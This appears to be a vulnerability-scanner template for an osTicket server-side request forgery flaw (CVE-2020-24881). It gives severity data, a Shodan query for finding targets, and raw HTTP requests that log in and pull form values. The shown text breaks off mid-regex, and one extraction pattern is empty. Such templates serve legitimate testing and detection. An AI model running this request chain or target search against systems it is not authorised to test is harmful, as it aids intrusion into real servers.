id: CVE-2020-24881 info: name: OsTicket < 1.14.3 - Server Side Request Forgery author: hnd3884 severity: critical description: | SSRF vulnerability exists in osTicket before 1.14.3, allowing an attacker to add malicious files to the server or perform port scanning. impact: | Authenticated attackers can perform SSRF attacks to scan internal ports, access internal services, or retrieve sensitive information from internal systems. remediation: | Upgrade to osTicket version 1.14.3 or later. reference: - https://blackbatsec.medium.com/cve-2020-24881-server-side-request-forgery-in-osticket-eea175e147f0 - https://nvd.nist.gov/vuln/detail/CVE-2020-24881 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24881 cwe-id: CWE-918 epss-score: 0.73267 epss-percentile: 0.994 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: osticket product: osticket shodan-query: title:"osticket" tags: cve,cve2020,osticket,ssrf,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) http: - raw: - | GET /login.php HTTP/1.1 Host: {{Hostname}} - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded __CSRFToken__={{csrf_token}}&luser={{username}}&lpasswd={{password}} extractors: - type: regex name: csrf_token part: body group: 1 regex: - '' internal: true - raw: - | GET /open.php HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: option_value part: body group: 1 regex: - 'Select a Help Topic.+?[ \n]+